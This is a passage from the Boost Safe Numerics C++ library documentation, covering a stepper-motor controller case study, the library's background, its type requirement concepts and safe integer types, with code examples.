bit<pic_register_t , 7> RD16{T1CON};\n bit<pic_register_t , 5> T1CKPS1 {T1CON };\n bit<pic_register_t , 4> T1CKPS0 {T1CON };\n bit<pic_register_t , 3> T1OSCEN {T1CON };\n bit<pic_register_t , 2> T1SYNC {T1CON};\n bit<pic_register_t , 1> TMR1CS {T1CON};\n bit<pic_register_t , 0> TMR1ON {T1CON};\n} T1CONbits ;\n39Safe Numerics\n// define bits for T1CON register\nstruct {\n bit<pic_register_t , 7> GEI{INTCON };\n bit<pic_register_t , 5> PEIE{INTCON };\n bit<pic_register_t , 4> TMR0IE {INTCON };\n bit<pic_register_t , 3> RBIE{INTCON };\n bit<pic_register_t , 2> TMR0IF {INTCON };\n bit<pic_register_t , 1> INT0IF {INTCON };\n bit<pic_register_t , 0> RBIF{INTCON };\n} INTCONbits ;\n#include \"motor3.c\"\n#include <chrono >\n#include <thread >\n// round 24.8 format to microseconds\nmicroseconds to_microseconds (ccpr_t t){\n return (t + literal (128)) / literal (256);\n}\nusing result_t = uint8_t ;\nconst result_t success = 1;\nconst result_t fail = 0;\n// move motor to the indicated target position in steps\nresult_t test(position_t new_position ){\n try {\n std::cout << \"move motor to \" << new_position << '\\n';\n motor_run (new_position );\n std::cout\n << \"step #\" << ' '\n << \"delay(us)(24.8)\" << ' '\n << \"delay(us)\" << ' '\n << \"CCPR\" << ' '\n << \"motor position\" << '\\n';\n while (busy()){\n std::this_thread ::sleep_for (std::chrono ::microseconds (to_microseconds (c)));\n c_t last_c = c;\n ccpr_t last_ccpr = ccpr;\n isr_motor_step ();\n std::cout << i << ' '\n << last_c << ' '\n << to_microseconds (last_c ) << ' '\n << std::hex << last_ccpr << std::dec << ' '\n << motor_position << '\\n';\n };\n }\n catch (const std::exception & e){\n std::cout << e.what() << '\\n';\n return fail;\n }\n return success ;\n}\nint main(){\n std::cout << \"start test\\n\" ;\n result_t result = success ;\n try {\n40Safe Numerics\n initialize ();\n // move motor to position 1000\n result &= test(literal (9000));\n // move to the left before zero position\n // fails to compile !\n // result &= ! test(-10);\n // move motor to position 200\n result &= test(literal (200));\n // move motor to position 200 again! Should result in no movement.\n result &= test(literal (200));\n // move motor to position 50000.\n result &= test(literal (50000));\n // move motor back to position 0.\n result &= test(literal (0));\n }\n catch (...){\n std::cout << \"test interrupted\\n\" ;\n return EXIT_FAILURE ;\n }\n std::cout << \"end test\\n\" ;\n return result == success ? EXIT_SUCCESS : EXIT_FAILURE ;\n} \nHere are the changes we've made int the desktop test program\n1.Specify exception policies so we can generate a compile time error whenever an operation MIGHT fail. We've aliased this\npolicy with the name trap_policy . The default policy of which throws a runtime exception when an error is countered is\naliased as exception_policy . When creating safe types, we'll now specify which type of checking, compile time or runtime,\nwe want done.\n2.Create a macro named \"literal\" an integral value that can be evaluated at compile time.\n\"literal\" values are instances of safe numeric types which are determined at compile time. They are constexpr values. When\nused along with other instances of safe numeric types, the compiler can calculate the range of the result and verify whether or\nnot it can be contained in the result type. To create \"literal\" types we use the macro make_safe_literal (n, p, e) where n\nis the value, p is the promotion policy and e is the exception policy .\nWhen all the values in an expression are safe numeric values, the compiler can calculate the narrowest range of the result.\nIf all the values in this range can be represented by the result type, then it can be guaranteed that an invalid result cannot be\nproduced at runtime and no runtime checking is required.\nMake sure that all literal values are x are replaced with the macro invocation \"literal(x)\".\nIt's unfortunate that the \"literal\" macro is required as it clutters the code. The good news is that is some future version of C++,\nexpansion of constexpr facilities may result in elimination of this requirement.\n3.Create special types for the motor program. These will guarantee that values are in the expected ranges and permit compile\ntime determination of when exceptional conditions might occur. In this example we create a special type c_t to the width of\nthe pulse applied to the motor. Engineering constraints (motor load inertia) limit this value to the range of C0 to C_MIN. So\nwe create a type with those limits. By using limits no larger than necessary, we supply enough information for the compiler to\ndetermine that the result of a calculation cannot fall outside the range of the result type. So less runtime checking is required.\nIn addition, we get extra verification at compile time that values are in reasonable ranges for the quantity being modeled.\nWe call these types \"strong types\".\nAnd we've made changes consistent with the above to motor3.c as well\n/*\n41Safe Numerics\n * david austin\n * http://www.embedded.com/design/mcus-processors-and-socs/4006438/Generate-stepper-motor-speed-profiles-in-real-time\n * DECEMBER 30, 2004\n *\n * Demo program for stepper motor control with linear ramps\n * Hardware: PIC18F252, L6219\n *\n * Copyright (c) 2015 Robert Ramey\n *\n * Distributed under the Boost Software License, Version 1.0. (See\n * accompanying file LICENSE_1_0.txt or copy at\n * http://www.boost.org/LICENSE_1_0.txt)\n */\n#include <assert .h>\n// ramp state-machine states\nenum ramp_state {\n ramp_idle = 0,\n ramp_up = 1,\n ramp_const = 2,\n ramp_down = 3,\n};\n// ***************************\n// 1. Define state variables using custom strong types\n// initial setup\nenum ramp_state ramp_sts ;\nposition_t motor_position ;\nposition_t m; // target position\nposition_t m2; // midpoint or point where acceleration changes\ndirection_t d; // direction of traval -1 or +1\n// curent state along travel\nstep_t i; // step number\nc_t c; // 24.8 fixed point delay count increment\nccpr_t ccpr; // 24.8 fixed point delay count\nphase_ix_t phase_ix ; // motor phase index\n// ***************************\n// 2. Surround all literal values with the \"literal\" keyword\n// Config data to make CCP1&2 generate quadrature sequence on PHASE pins\n// Action on CCP match: 8=set+irq; 9=clear+irq\nphase_t const ccpPhase [] = {\n literal (0x909),\n literal (0x908),\n literal (0x808),\n literal (0x809)\n}; // 00,01,11,10\nvoid current_on (){/* code as needed */ } // motor drive current\nvoid current_off (){/* code as needed */ } // reduce to holding value\n// ***************************\n// 3. Refactor code to make it easier to understand\n// and relate to the documentation\nbool busy(){\n42Safe Numerics\n return ramp_idle != ramp_sts ;\n}\n// set outputs to energize motor coils\nvoid update (ccpr_t ccpr_arg , phase_ix_t phase_ix_arg ){\n // energize correct windings\n const phase_t phase = ccpPhase [phase_ix_arg ];\n CCP1CON = phase & literal (0xff); // set CCP action on next match\n CCP2CON = phase >> literal (8);\n // timer value at next CCP match\n CCPR1H = literal (0xff) & (ccpr_arg >> literal (8));\n CCPR1L = literal (0xff) & ccpr_arg ;\n}\n// compiler-specific ISR declaration\n// ***************************\n// 4. Rewrite interrupt handler in a way which mirrors the orginal\n// description of the algorithm and minimizes usage of state variable,\n// accumulated values, etc.\nvoid __interrupt isr_motor_step (void) { // CCP1 match -> step pulse + IRQ\n // *** possible exception\n // motor_position += d;\n // use the following to avoid mixing exception policies which is an error\n if(d < 0)\n --motor_position ;\n else\n ++motor_position ;\n // *** possible exception\n ++i;\n // calculate next difference in time\n for(;;){\n switch (ramp_sts ) {\n case ramp_up : // acceleration\n if (i == m2) {\n ramp_sts = ramp_down ;\n continue ;\n }\n // equation 13\n // *** possible negative overflow on update of c\n c -= literal (2) * c / (literal (4) * i + literal (1));\n if(c < C_MIN){\n c = C_MIN;\n ramp_sts = ramp_const ;\n // *** possible exception\n m2 = m - i; // new inflection point\n continue ;\n }\n break;\n case ramp_const : // constant speed\n if(i > m2) {\n ramp_sts = ramp_down ;\n continue ;\n }\n break;\n case ramp_down : // deceleration\n if (i == m) {\n ramp_sts = ramp_idle ;\n current_off (); // reduce motor current to holding value\n CCP1IE = literal (0); // disable_interrupts(INT_CCP1);\n return ;\n43Safe Numerics\n }\n // equation 14\n // *** possible positive overflow on update of c\n // note: re-arrange expression to avoid negative result\n // from difference of two unsigned values\n {\n // testing discovered that this can overflow. It's not easy to\n // avoid so we'll use a temporary unsigned variable 32 bits wide\n const temp_t x = c + literal (2) * c / (literal (4) * (m - i) - literal (1));\n c = x > C0 ? C0 : x;\n }\n break;\n default :\n // should never arrive here!\n assert (false);\n } // switch (ramp_sts)\n break ;\n }\n assert (c <= C0 && c >= C_MIN);\n // *** possible exception\n ccpr = literal (0xffffff ) & (ccpr + c);\n phase_ix = (phase_ix + d) & literal (3);\n update (ccpr, phase_ix );\n} // isr_motor_step()\n// set up to drive motor to pos_new (absolute step#)\nvoid motor_run (position_t new_position ) {\n if(new_position > motor_position ){\n d = literal (1);\n // *** possible exception\n m = new_position - motor_position ;\n }\n else\n if(motor_position > new_position ){\n d = literal (-1);\n // *** possible exception\n m = motor_position - new_position ;\n }\n else{\n d = literal (0);\n m = literal (0);\n ramp_sts = ramp_idle ; // start ramp state-machine\n return ;\n }\n i = literal (0);\n m2 = m / literal (2);\n ramp_sts = ramp_up ; // start ramp state-machine\n T1CONbits .TMR1ON = literal (0); // stop timer1;\n current_on (); // current in motor windings\n c = C0;\n ccpr = (TMR1H << literal (8) | TMR1L) + C0 + literal (1000);\n phase_ix = d & literal (3);\n update (ccpr, phase_ix );\n CCP1IE = literal (1); // enable_interrupts(INT_CCP1);\n44Safe Numerics\n T1CONbits .TMR1ON = literal (1); // restart timer1;\n} // motor_run()\nvoid initialize () {\n di(); // disable_interrupts(GLOBAL);\n motor_position = literal (0);\n CCP1IE = literal (0); // disable_interrupts(INT_CCP1);\n CCP2IE = literal (0); // disable_interrupts(INT_CCP2);\n PORTC = literal (0); // output_c(0);\n TRISC = literal (0); // set_tris_c(0);\n T3CON = literal (0);\n T1CON = literal (0x35);\n INTCONbits .PEIE = literal (1);\n INTCONbits .RBIF = literal (0);\n ei(); // enable_interrupts(GLOBAL);\n} // initialize()\n1.Define variables using strong types\n2.Surround all literal values with the \"literal\" keyword\n3.Re-factor code to make it easier to understand and compare with the algorithm as described in the original article.\n4.Rewrite interrupt handler in a way which mirrors the original description of the algorithm and minimizes usage of state\nvariable, accumulated values, etc.\n5.Distinguish all the statements which might invoke a runtime exception with a comment. There are 12 such instances.\nFinally we make a couple minor changes in motor_test3.c to verify that we can compile the exact same version of motor3.c on the\nPIC as well as on the desktop.\nSummary\nThe intent of this case study is to show that the Safe Numerics Library can be an essential tool in validating the correctness of C/C\n++ programs in all environments - including the most restricted.\n•We started with a program written for a tiny micro controller for controlling the acceleration and deceleration of a stepper\nmotor. The algorithm for doing this is very non-trivial and difficult prove that it is correct.\n•We used the type promotion policies of the Safe Numerics Library to test and validate this algorithm on the desk top. The\ntested code is also compiled for the target micro controller.\n•We used strong typing features of Safe Numerics to check that all types hold the values expected and invoke no invalid implicit\nconversions. Again the tested code is compiled for the target processor.\nWhat we failed to do is to create a version of the program which uses the type system to prove that no results can be invalid. I\nturns out that states such as\n++i;\nc = f(c);\ncan't be proved not to overflow with this system. So we're left with having to depend upon exhaustive testing. It's not what we\nhoped, but it's the best we can do.\n45Safe Numerics\n5. Background\nThis library started out as a re-implementation of the facilities provided by David LeBlanc's SafeInt Library . I found this library\nto be well done in every way. My main usage was to run unit tests for my embedded systems projects on my PC. Still, from my\nperspective it had a few issues.\n•It was a lot of code in one header - 6400 lines. Very unwieldy to understand, modify and maintain.\n•I couldn't find separate documentation other than that in the header file.\n•It didn't use Boost conventions for naming.\n•It required porting to different compilers.\n•It had a very long license associated with it.\n•I could find no test suite for the library.\nUsing later versions of C++ and the its standard library, template metaprogramming and Boost libraries I managed to\n(re)implement similar functionality in under 2000 ? lines of code. I promoted this version as a possible submission to the\nBoost. The feedback I received convinced me that no such library would be considered acceptable to the large majority of C++\nprogrammers. It seems that the desire for maximum performance overrides any requirement that a program be known to be free\nof bugs. By this time I had a better idea of the opportunities available with the latest version of C++ (C++14) and resolved to\naddress this issue by creating a library which would provide all the facilities of safe numerics at minimal runtime cost. The result\nis what you see here. The library now consists of 7000 lines of code, approximately 50 separate tests and more than 60 pages of\ndocumentation and examples.\nSince I wrote the above, I've been contacted by David LeBlanc. He's been updating his package and informs me that the latest\nversion:\n•SafeInt does not require porting for different compilers, is fully supported on gcc, clang, and Visual Studio.\n•The license has been changed from MS-PL to MIT license.\n•The library has had a test suite since before it was public, and is now located here:\n•SafeInt also has no external dependencies other than standard library files, and doesn't need anything else installed to work.\nHis current package can now be found at in github.\n6. Type Requirements\n6.1. Numeric<T>\nDescription\nA type is Numeric if it has the properties of a number.\nMore specifically, a type T is Numeric if there exists a specialization of std::numeric_limits<T> . See the documentation\nfor the standard library class numeric_limits . The standard library includes such specializations for all the built-in numeric\ntypes. Note that this concept is distinct from the C++ standard library type traits is_integral and is_arithmetic . These\n46Safe Numerics\nlatter fulfill the requirement of the concept Numeric. But there may types which fulfill the concept of Numeric for which\nstd::is_arithmetic<T> == false .\nThere are multiple reasons that we cannot use std::is_arithmetic<T> to identify number-like types for our purposes:\n•The main purpose of our concept of Numeric<T> is to indicate that the range of type T is available to be queried. Since all\nspecializations of Numeric<T> have a member in std::numeric_limits<T> we have access to this information when needed\nthrough the members std::numeric_limits<T>::min() and std::numeric_limits<T>::max().\n•There are types which do not fulfill std::arithmetic<T> (that is are not built-in numeric types) but still fulfill the concept of\nNumeric<T> (number like \"things\").\n•The library creates new result types for every expression which should also fulfill this concept Numeric. But is_arithmetic<T>\ncannot be specialized for user types.\nSo is_arithmetic<T> does not correspond to the same set of types as Numeric<T> does.\nNotation\nT, U, V A type that is a model of a Numeric type\nt, u An object of a type modeling a Numeric type\nOS, IS A type that is a model of an output or input stream\nos, is An object of a type modeling output or input stream\nAssociated Types\nstd::numeric_limits<T> The numeric_limits class template provides a C++ program with information about various\nproperties of the implementation's representation of the arithmetic types. See C++ standard\n18.3.2.2.\nValid Expressions\nIn addition to the expressions defined in Assignable the following expressions must be valid. In the safe_numerics library, a type\nis considered Numeric if and only if it it has an entry in the std::numeric_limits table with the following members. Note that this\nis different from the the definition of std::is_arithmetic in that the later is required to support all valid expressions which Numeric\ndoes not require support for all these expressions but only requires that they be correctly implemented if they are defined. Also\nis_arithmetic is only defined for built in numeric types while Numeric applies to any user types which \"look like\" a number.\nTable 1.1. General\nExpression Return Type Return Value\nNumeric<T> true_type \nNumeric<T>() bool true\nstd::numeric_limits<T>::is_specialized bool true\nstd::numeric_limits<T>::is_integer bool true or false\n47Safe Numerics\nExpression Return Type Return Value\nstd::numeric_limits<T>::is_signed bool true or false\nAny or all of the following unary operators MAY be defined. Any such defined operators shall implement the semantics as\ndescribed below\nTable 1.2. Unary Operators\nExpression Return Type Semantics\n-t T Invert sign\n+t T unary plus - a no op\nt-- T post decrement\nt++ T post increment\n--t T pre decrement\n++t T pre increment\nAny or all of the following binary operators MAY be defined. Any defined operators shall implement the semantics as described\nbellow\nTable 1.3. Binary Operators\nExpression Return Type Semantics\nt - u V subtract u from t\nt + u V add u to t\nt * u V multiply t by u\nt / u T divide t by u\nt < u bool true if t less than u, false otherwise\nt <= u bool true if t less than or equal to u, false otherwise\nt > u bool true if t greater than u, false otherwise\nt >= u bool true if t greater than or equal to u, false otherwise\nt == u bool true if t equal to u, false otherwise\nt != u bool true if t not equal to u, false otherwise\nt = u T assign value of u to t\n48Safe Numerics\nExpression Return Type Semantics\nt += u T add u to t and assign to t\nt -= u T subtract u from t and assign to t\nt *= u T multiply t by u and assign to t\nt /= u T divide t by u and assign to t\nos << t OS & write contents of t to output stream\nis >> t IS & read contents of an input stream into t\nModels\nint, float, safe_signed_integer<int>, safe_signed_range<int>, checked_result<int>, etc.\nHeader\n#include <boost/safe_numerics/concepts/numeric.hpp>\nNote on Usage of std::numeric_limits\nThis in turn raises another question: Is it \"legal\" to specialize std::numeric_limits for one's own types such as safe<int> .\nIn my view the standard is ambiguous on this. See various interpretations:\n•is-it-ok-to-specialize-stdnumeric-limitst-for-user-defined-number-like-class\n•cppreference.com/w/cpp/types/numeric_limits\nIn any case, it seems pretty clear that no harm will come of it. In spite of the consideration given to this issue, it turns out that\nthe found no real need to implement these predicates. For example, there is no \"is_numeric<T>\" implemented as part of the safe\nnumerics library. This may change in the future though. Even if not used, defining and maintaining these type requirements in this\ndocument has been very valuable in keeping the concepts and code more unified and understandable.\nRemember that above considerations apply to other numeric types used in this library even though we don't explicitly repeat this\ninformation for every case.\n6.2. Integer<T>\nDescription\nA type fulfills the requirements of an Integer if it has the properties of a integer.\nMore specifically, a type T is Integer if there exists a specialization of std::numeric_limits<T> for which\nstd::numeric_limits<T>::is_integer is equal to true. See the documentation for standard library class\nnumeric_limits . The standard library includes such specializations for all built-in numeric types. Note that this concept is\ndistinct from the C++ standard library type traits is_integral and is_arithmetic . These latter fulfill the requirements of\nthe concept Numeric. But there are types which fulfill this concept for which is_arithmetic<T>::value == false . For\nexample see safe<int> .\n49Safe Numerics\nRefinement of\nNumeric\nNotation\nT, U, V A type that is a model of an Integer type\nt, u An object of type modeling an Integer type\nOS, IS A type that is a model of an output or input stream\nos, is An object of a type modeling output or input stream\nValid Expressions\nIn addition to the expressions defined in Integer, the following expression must be true.\nTable 1.4. General\nExpression Value\nstd::numeric_limits<T>::is_integer true\nAny or all of the following unary operators MAY be defined. Any such defined operators shall implement the semantics as\ndescribed below\nTable 1.5. Unary Operator\nExpression Return Type Semantics\n~t T bitwise complement\nAny or all of the following binary operators MAY be defined. Any defined operators shall implement the semantics as described\nbellow\nTable 1.6. Binary Operators\nExpression Return Type Semantics\nt % u T t modulus u. t can be a Numeric type.\nt << u T shift t left u bits\nt >> u T shift t right by u bits\nt & u V and of t and u padded out to max # bits in t, u\nt | u V or of t and u padded out to max # bits in t, u\n50Safe Numerics\nExpression Return Type Semantics\nt ^ u V exclusive or of t and u padded out to max # bits in t, u\nt <<= u T left shift the value of t by u bits\nt >>= u T right shift the value of t by u bits\nt &= u T and the value of t with u and assign to t\nt |= u T or the value of t with u and assign to t\nt ^= u T exclusive or the value of t with u and assign to t\nos << t OS & write contents of t to output stream\nis >> t IS & read contents of an input stream into t\nModels\nint, safe<int>, safe_unsigned_range<0, 11>, checked_result<int> etc.\nHeader\n#include <boost/safe_numerics/concepts/integer.hpp>\n6.3. PromotionPolicy<PP>\nDescription\nIn C++ expressions, arguments must be of the same type. If they are not, all arguments are converted to a common type in\naccordance with rules of the C++ standard. For some applications of the safe numerics library, we might want conversions which\nare different than the standard ones. This class type implements the conversion functions that are to be used with the safe numeric\ntype being instantiated.\nint x;\nchar y;\nauto z = x + y\nthe type of z will be an int. This is a consequence for the standard rules for type promotion for C/C++ arithmetic. A key feature\nof library permits one to specify his own type promotion rules via a PromotionPolicy class.\nNotation\nPP A type that full fills the requirements of a PromotionPollicy\nT, U A type that is a model of the Numeric concept\nR An object of type modeling Numeric which can be used to construct a SafeNumeric type.\n51Safe Numerics\nValid Expressions\nAny operations which result in integers which cannot be represented as some Numeric type will throw an exception.These\nexpressions return a type which can be used as the basis create a SafeNumeric type.\nExpression Return Value\nPP::addition_result<T, U>::type unspecified Numeric type\nPP::subtraction_result<T, U>::type unspecified Numeric type\nPP::multiplication_result<T, U>::type unspecified Numeric type\nPP::division_result<T, U>::type unspecified Numeric type\nPP::modulus_result<T, U>::type unspecified Numeric type\nPP::comparison_result<T, U>::type bool\nPP::left_shift_result<T, U>::type unspecified Numeric type\nPP::right_shift_result<T, u>::type unspecified Numeric type\nPP::bitwise_or_result<T, U>::type unspecified Numeric type\nPP::bitwise_and_result<T, U>::type unspecified Numeric type\nPP::bitwise_xor_result<T, U>::type unspecified Numeric type\nModels\nThe library contains a number of pre-made promotion policies:\n•boost::numeric::native\nUse the normal C/C++ expression type promotion rules.\nint x;\nchar y;\nauto z = x + y; // could result in overflow\nsafe<int, native > sx;\nauto sz = sx + y; // standard C++ code which detects errors\nType sz will be a SafeNumeric type based on int. If the result exceeds the maximum value that can be stored in an int, an\nerror is detected.\nThe native policy is documented in Promotion Policies - native .\n•boost::numeric::automatic\nUse optimizing expression type promotion rules. These rules replace the normal C/C++ type promotion rules with other rules\nwhich are designed to result in more efficient computations. Expression types are promoted to the smallest type which can be\nguaranteed to hold the result without overflow. If there is no such type, the result will be checked for overflow. Consider the\nfollowing example:\n52Safe Numerics\nint x;\nchar y;\nauto z = x + y; // could result in overflow\nsafe<int, automatic > sx;\nauto sz = sx + y; \n // sz is a safe type based on long\n // hence sz is guaranteed not to overflow.\nsafe_unsigned_range <1, 4> a;\nsafe_unsigned_range <2, 4> b;\nauto c = a + b; // c will be a safe type with a range [3,8] and cannot overflow\nType sz will be a SafeNumeric type which is guaranteed to hold he result of x + y. In this case that will be a long int (or\nperhaps a long long) depending upon the compiler and machine architecture. In this case, there will be no need for any special\nchecking on the result and there can be no overflow.\nType of c will be a signed character as that type can be guaranteed to hold the sum so no overflow checking is done.\nThis policy is documented in Promotion Policies - automatic\n•boost::numeric::cpp\nUse expression type promotion rules to emulate another processor. When this policy is used, C++ type for safe integers follows\nthe rules that a compiler on the target processor would use. This permits one to test code destined for a one processor on the\nanother one. One situation there this can be very, very useful is when testing code destined for a micro controller which doesn't\nhave the logging, debugging, input/output facilities of a desktop.\n// specify a promotion policy to support proper emulation of \n// PIC 18f2520 types on the desktop\nusing pic16_promotion = boost::numeric ::cpp<\n 8, // char 8 bits\n 16, // short 16 bits\n 16, // int 16 bits\n 16, // long 16 bits\n 32 // long long 32 bits\n>;\n...\nsafe<std::uint16_t , pic16_promotion > x, y;\n...\nx + y; // detect possible overflow on the pic.\nFor a complete example see Safety Critical Embedded Controller .\nHeader\n#include <boost/safe_numerics/concepts/promotion_policy.hpp>\n6.4. ExceptionPolicy<EP>\nDescription\nThe exception policy specifies what is to occur when a safe operation cannot return a valid result. A type is an ExceptionPolicy if\nit has functions for handling exceptional events that occur in the course of safe numeric operations.\n53Safe Numerics\nNotation\nEP A type that fulfills the requirements of an ExceptionPolicy\ne A code from safe_numerics_error\nmessage A const char * which refers to a text message about the cause of an exception\nValid Expressions\nWhenever an operation yield an invalid result, one of the following functions will be invoked.\nExpression Return\nValueInvoked when:\nEP::on_arithmetic_error(e, message) voidThe operation cannot produce valid arithmetic result such as\noverflows, divide by zero, etc.\nEP::on_undefined_behavior(e, message) voidThe result is undefined by the C++ standard\nEP::on_implementation_defined_behavior(e,\nmessage)voidThe result depends upon implementation defined behavior\naccording to the C++ standard\nEP::on_uninitialized_value(e,\nmessage)voidA variable is not initialized\ndispatch<EP>(const safe_numerics_error & e, const char * msg)\nThis function is used to invoke the exception handling policy for a particular exception code.\nSynopsis\ntemplate <class EP>\nconstexpr void\ndispatch <EP>(const boost::numeric ::safe_numerics_error & e, char const * const & msg);\nExample of use\n#include <boost /safe_numerics /exception_policies .hpp\"\ndispatch<boost::numeric::loose_exception_policy>(\n boost::numeric::safe_numerics_error::positive_overflow_error, \n \"operation resulted in overflow \"\n);\nModels\nThe library header <boost/safe_numerics/exception_policies.hpp> contains a number of pre-made exception policies:\n•boost::numeric::loose_exception_policy\n54Safe Numerics\nThrow on arithmetic errors, ignore other errors. Some applications ignore these issues and still work and we don't want to\nupdate them.\n•boost::numeric::loose_trap_policy\nSame as above in that it doesn't check for various undefined behaviors but traps at compile time for hard arithmetic errors. This\npolicy would be suitable for older embedded systems which depend on bit manipulation operations to work.\n•boost::numeric::strict_exception_policy\nPermit just about anything, throw at runtime on any kind of error. Recommended for new code. Check everything at compile\ntime if possible and runtime if necessary. Trap or Throw as appropriate. Should guarantee code to be portable across\narchitectures.\n•boost::numeric::strict_trap_policy\nSame as above but requires code to be written in such a way as to make it impossible for errors to occur. This naturally will\nrequire extra coding effort but might be justified for embedded and/or safety critical systems.\n•boost::numeric::default_exception_policy\nAlias for strict_exception_policy , One would use this first. After experimentation, one might switch to one of the above\npolicies or perhaps use a custom policy.\nHeader\n#include <boost/safe_numerics/concepts/exception_policy.hpp>\n7. Types\n7.1. safe<T, PP, EP>\nDescription\nA safe<T, PP , EP> can be used anywhere a type T can be used. Any expression which uses this type is guaranteed to return\nan arithmetically correct value or to trap in some way.\nNotation\nSymbol Description\nT Underlying type from which a safe type is being derived\nAssociated Types\nPP Promotion Policy. A type which specifies the result type of an expression using safe types.\nEP Exception Policy. A type containing members which are called when a correct result cannot be returned\n55Safe Numerics\nTemplate Parameters\nParameter Type Requirements Description\nT std::is_integer<T> The underlying type. Currently only built-in integer types are supported\nPP PromotionPolicy<PP> Optional promotion policy. Default value is boost::numeric::native\nEP Exception Policy<EP> Optional exception policy. Default value is\nboost::numeric::default_exception_policy\nSee examples below.\nModel of\nNumeric\nInteger\nValid Expressions\nImplements all expressions and only those expressions supported by the base type T. Note that all these expressions are\nconstexpr . The result type of such an expression will be another safe type. The actual type of the result of such an expression\nwill depend upon the specific promotion policy template parameter.\nWhen a binary operand is applied to two instances of safe<T, PP, EP>one of the following must be true:\n•The promotion policies of the two operands must be the same or one of them must be void\n•The exception policies of the two operands must be the same or one of them must be void\nIf either of the above is not true, a compile error will result.\nExamples of use\nThe most common usage would be safe<T> which uses the default promotion and exception policies. This type is meant to be a\n\"drop-in\" replacement of the intrinsic integer types. That is, expressions involving these types will be evaluated into result types\nwhich reflect the standard rules for evaluation of C++ expressions. Should it occur that such evaluation cannot return a correct\nresult, an exception will be thrown.\nThere are two aspects of the operation of this type which can be customized with a policy. The first is the result type of an\narithmetic operation. C++ defines the rules which define this result type in terms of the constituent types of the operation.\nHere we refer to these rules as \"type promotion\" rules. These rules will sometimes result in a type which cannot hold the actual\narithmetic result of the operation. This is the main motivation for making this library in the first place. One way to deal with this\nproblem is to substitute our own type promotion rules for the C++ ones.\nAs a Drop-in replacement for standard integer types.\nThe following program will throw an exception and emit an error message at runtime if any of several events result in an incorrect\narithmetic result. Behavior of this program could vary according to the machine architecture in question.\n#include <exception >\n#include <iostream >\n56Safe Numerics\n#include <safe_integer .hpp>\nvoid f(){\n using namespace boost ::safe_numerics ;\n safe<int> j;\n try {\n safe<int> i;\n std::cin >> i; // could overflow !\n j = i * i; // could overflow\n }\n catch (std::exception & e){\n std::cout << e.what() << std::endl;\n }\n std::cout << j;\n}\nThe term \"drop-in replacement\" reveals the aspiration of this library. In most cases, this aspiration is realized. In the following\nexample, the normal implicit conversions function the same for safe integers as they do for built-in integers.\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <boost/safe_numerics /safe_integer .hpp>\nusing namespace boost::safe_numerics ;\nint f(int i){\n return i;\n}\nusing safe_t = safe<long>;\nint main(){\n const long x = 97;\n f(x); // OK - implicit conversion to int\n const safe_t y = 97;\n f(y); // Also OK - checked implicit conversion to int\n return 0;\n}\nWhen the safe<long> is implicitly converted to an int when calling f, the value is checked to be sure that it is within the legal\nrange of an int and will invoke an exception if it cannot. We can easily verify this by altering the exception handling policy in\nthe above example to loose_trap_policy . This will invoke a compile time error on any conversion might invoke a runtime\nexception.\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <boost/safe_numerics /safe_integer .hpp>\n#include <cstdint > // uint8_t\nusing namespace boost::safe_numerics ;\n57Safe Numerics\nuint8_t f(uint8_t i){\n return i;\n}\nusing safe_t = safe<long, native , loose_trap_policy >;\nint main(){\n const long x = 97;\n f(x); // OK - implicit conversion to int can never fail\n const safe_t y = 97;\n f(y); // could overflow so trap at compile time\n return 0;\n}\nBut this raises it's own questions. We can see that in this example, the program can never fail:\n•The value 97 is assigned to y\n•y is converted to an int\n•and used as an argument to f\nThe conversion can never fail because the value of 97 can always fit into an int. But the library code can't detect this and emits the\nchecking code even though it's not necessary.\nThis can be addressed by using a safe_literal . A safe literal can contain one and only one value. All the functions in this\nlibrary are marked constexpr . So it can be determined at compile time that conversion to an int can never fail and no runtime\nchecking code need be emitted. Making this small change will permit the above example to run with zero runtime overhead while\nguaranteeing that no error can ever occur.\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <boost /safe_numerics /safe_integer .hpp>\n#include <boost /safe_numerics /safe_integer_literal .hpp>\nusing namespace boost::safe_numerics ;\nint f(int i){\n return i;\n}\ntemplate <intmax_t N>\nusing safe_literal = safe_signed_literal <N, native , loose_trap_policy >;\nint main(){\n const long x = 97;\n f(x); // OK - implicit conversion to int\n const safe_literal <97> y;\n f(y); // OK - y is a type with min/max = 97;\n return 0;\n}\nWith this trivial example, such efforts would hardly be deemed necessary. But in a more complex case, perhaps including compile\ntime arithmetic expressions, it could be much more difficult to verify that the constant is valid and/or no checking code is needed.\n58Safe Numerics\nAnd there is also possibility that over the life time of the application, the compile time constants might change, thus rendering any\nad hoc analyse obsolete. Using safe_literal will future-proof your code against well-meaning, but code-breaking updates.\nAdjust type promotion rules.\nAnother way to avoid arithmetic errors like overflow is to promote types to larger sizes before doing the arithmetic.\nStepping back, we can see that many of the cases of invalid arithmetic wouldn't exist if the result types were larger. So we\ncan avoid these problems by replacing the C++ type promotion rules for expressions with our own rules. This can be done\nby specifying a promotion policy automatic . The policy stores the result of an expression in the smallest size type that can\naccommodate the largest value that an expression can yield. No checking for exceptions is necessary. The following example\nillustrates this.\n#include <boost/safe_numerics /safe_integer .hpp>\n#include <iostream >\nint main(int, char[]){\n using safe_int = safe<\n int, boost::numeric ::automatic , \n boost ::numeric ::default_exception_policy\n >; \n safe_int i;\n std::cin >> i; // might throw exception\n auto j = i * i; // won't ever trap - result type can hold the maximum value of i * i\n static_assert (boost::numeric ::is_safe <decltype (j)>::value); // result is another safe type\n static_assert (\n std::numeric_limits <decltype (i * i)>::max() >=\n std::numeric_limits <safe_int >::max() * std::numeric_limits <safe_int >::max()\n ); // always true\n return 0;\n}\nHeader\n#include <boost/safe_numerics/safe_integer.hpp>\n7.2. safe_signed_range<MIN, MAX, PP, EP> and\nsafe_unsigned_range<MIN, MAX, PP, EP>\nDescription\nThis type holds a signed or unsigned integer in the closed range [MIN, MAX]. A safe_signed_range<MIN, MAX, PP, EP>\nor safe_unsigned_range<MIN, MAX, PP, EP> can be used anywhere an arithmetic type is permitted. Any expression which\nuses either of these types is guaranteed to return an arithmetically correct value or to trap in some way.\nNotation\nSymbol Description\nMIN, MAX Minimum and maximum values that the 